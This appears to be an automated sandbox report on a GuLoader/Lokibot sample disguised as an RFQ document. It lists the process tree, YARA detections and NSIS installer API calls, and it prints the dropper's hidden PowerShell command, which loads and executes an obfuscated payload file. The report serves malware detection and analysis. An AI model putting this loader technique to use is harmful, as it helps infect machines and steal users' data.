2024-04-03 04:37:22 UTC	1252	IN	Data Raw: 1b 07 65 1d 2b 24 cb e4 bf 24 17 64 76 73 d4 dd 6a 27 01 4b 52 74 ac 4d d1 47 d0 47 76 69 03 0e b8 aa 5f 56 db 2f 0b 74 12 06 a6 af 97 f7 74 6c 92 6f d3 12 35 cb 16 26 d1 ff ed ae 08 2f c6 a8 0a 87 75 a3 86 91 ff cb 2c ce 31 f5 7a f2 35 cf 26 46 16 4b 79 a9 e8 b0 ff 56 e5 ae 42 78 7b f2 5f bf f0 6f 5f 17 5b 88 9d d3 7f be ff 01 76 cc b2 c8 79 2c b0 cf db 2b 6b 56 b2 ba 1a d0 f1 45 eb be d6 dd ad 3e be 66 f4 f9 ef 96 f6 ce 57 11 15 0b 2d a9 1b 71 cb a4 b4 9d 77 5b c8 dd 4b 00 ab e7 b0 61 dc 46 8d 00 04 a1 54 ee ae 58 8d d7 d0 fe ef 9d 19 97 05 4e 62 b6 20 99 c4 bb ee 74 ac 8b 24 0f 73 2e 9f 96 5c 86 af 78 d1 09 ce 06 89 03 49 f0 ab 26 ce ee 6e 61 24 22 eb 3e 0b bc 13 29 b9 e1 78 f7 34 2b c5 09 79 b4 5d 74 5f e8 c6 5f 3c 3b 83 ef cc 77 f5 d6 f2 23 f4 12 02 Data Ascii: e+$$dvsj'KRtMGGvi_V/ttlo5&/u,1z5&FKyVBx{_o_[vy,+kVE>fW-qw[KaFTXNb t$s.\xI&na$">)x4+y]t__<;w#

Target ID:	0
Start time:	06:36:51
Start date:	03/04/2024
Path:	C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"
Imagebase:	0x400000
File size:	663'136 bytes
MD5 hash:	90FDA5C072FE00E8E737606ADD7F1276
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:36:55
Start date:	03/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmeringued.Brd';$Omkldningsrums=$Harish116.SubString(61425,3);.$Omkldningsrums($Harish116)"
Imagebase:	0x460000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1926920759.0000000008EBA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:36:55
Start date:	03/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:36:56
Start date:	03/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:37:14
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x3c0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:37:15
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Imagebase:	0x2f0000
File size:	96'192 bytes
MD5 hash:	3F6F254D24C457BF33227502ED4F0988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:37:15
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Imagebase:	0x2f0000
File size:	96'192 bytes
MD5 hash:	3F6F254D24C457BF33227502ED4F0988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:37:15
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Imagebase:	0x2f0000
File size:	96'192 bytes
MD5 hash:	3F6F254D24C457BF33227502ED4F0988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:37:15
Start date:	03/04/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Imagebase:	0x2f0000
File size:	96'192 bytes
MD5 hash:	3F6F254D24C457BF33227502ED4F0988
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1378
Total number of Limit Nodes:	40

Executed Functions

Function 004034FC Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040351F
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040354A
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040355D
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 004035F6
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403633
OleInitialize.OLE32(00000000), ref: 0040363A
SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403659
GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040366E
CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",00000020,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036A7
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037DF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037FC
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403818
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403829
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403831
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403845
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040391E

Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E

wsprintfW.USER32 ref: 0040397B
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039AE
DeleteFileW.KERNEL32(0042C800), ref: 004039BA
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039E8

Part of subcall function 004062E1: MoveFileExW.KERNEL32(?,?,00000005,00405DDF,?,00000000,000000F1,?,?,?,?,?), ref: 004062EB

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004039FE

Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A

Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A4C
ExitProcess.KERNEL32 ref: 00403A69
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A70
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ACB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
ExitProcess.KERNEL32 ref: 00403B13

Part of subcall function 00405ACF: CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5

Strings

TEMP, xrefs: 00403824
\Temp, xrefs: 004037F6
C:\Users\user\AppData\Local\Temp\, xrefs: 004037D4, 004037D9, 004037EF, 004037FB, 0040380A, 00403817, 00403823, 0040382B, 00403919, 0040399A, 004039C6, 004039E7, 004039F0
C:\Users\user\AppData\Local\Ubarberet, xrefs: 004037C4, 004038E6, 00403933, 00403941
"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering, xrefs: 00403929
~nsu%X.tmp, xrefs: 00403972
Low, xrefs: 00403812
SeShutdownPrivilege, xrefs: 00403AA2
C:\Users\user\Desktop, xrefs: 0040393C
1033, xrefs: 00403840
UXTHEME, xrefs: 004035EA, 004035EF, 004035F5
Error launching installer, xrefs: 004038C7
"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe", xrefs: 00403674, 0040367A, 0040368F, 0040386D
NSIS Error, xrefs: 0040365F
C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet, xrefs: 004038F1
TMP, xrefs: 0040382C

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"$"powershell.exe" -windowstyle hidden "$Harish116=Get-Content 'C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet\Unmering$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Ubarberet$C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-1224599865
Opcode ID: df948ee0e85ba6af299b539304e6c1f6cbb013da5962db7bb9a5cc4ee4bcf92f
Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
Opcode Fuzzy Hash: df948ee0e85ba6af299b539304e6c1f6cbb013da5962db7bb9a5cc4ee4bcf92f
Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004056E5 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405743
GetDlgItem.USER32(?,000003EE), ref: 00405752
GetClientRect.USER32(?,?), ref: 0040578F
GetSystemMetrics.USER32(00000002), ref: 00405796
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
ShowWindow.USER32(?,00000008), ref: 00405832
GetDlgItem.USER32(?,000003EC), ref: 00405853
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
GetDlgItem.USER32(?,000003F8), ref: 00405761

Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3

GetDlgItem.USER32(?,000003EC), ref: 004058A5
CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058BA
ShowWindow.USER32(00000000), ref: 004058DE
ShowWindow.USER32(?,00000008), ref: 004058E3
ShowWindow.USER32(00000008), ref: 0040592D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
CreatePopupMenu.USER32 ref: 00405972
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
GetWindowRect.USER32(?,?), ref: 004059A6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
OpenClipboard.USER32(00000000), ref: 00405A07
EmptyClipboard.USER32 ref: 00405A0D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
GlobalLock.KERNEL32(00000000), ref: 00405A23
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
GlobalUnlock.KERNEL32(00000000), ref: 00405A57
SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
CloseClipboard.USER32 ref: 00405A68

Strings

tt, xrefs: 00405937
{, xrefs: 0040594B

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: tt${
API String ID: 4154960007-2047934989
Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406C3F Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040687E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
FindClose.KERNEL32(00000000), ref: 00406895

Strings

X_B, xrefs: 0040687F

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: X_B
API String ID: 2295610775-941606717
Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
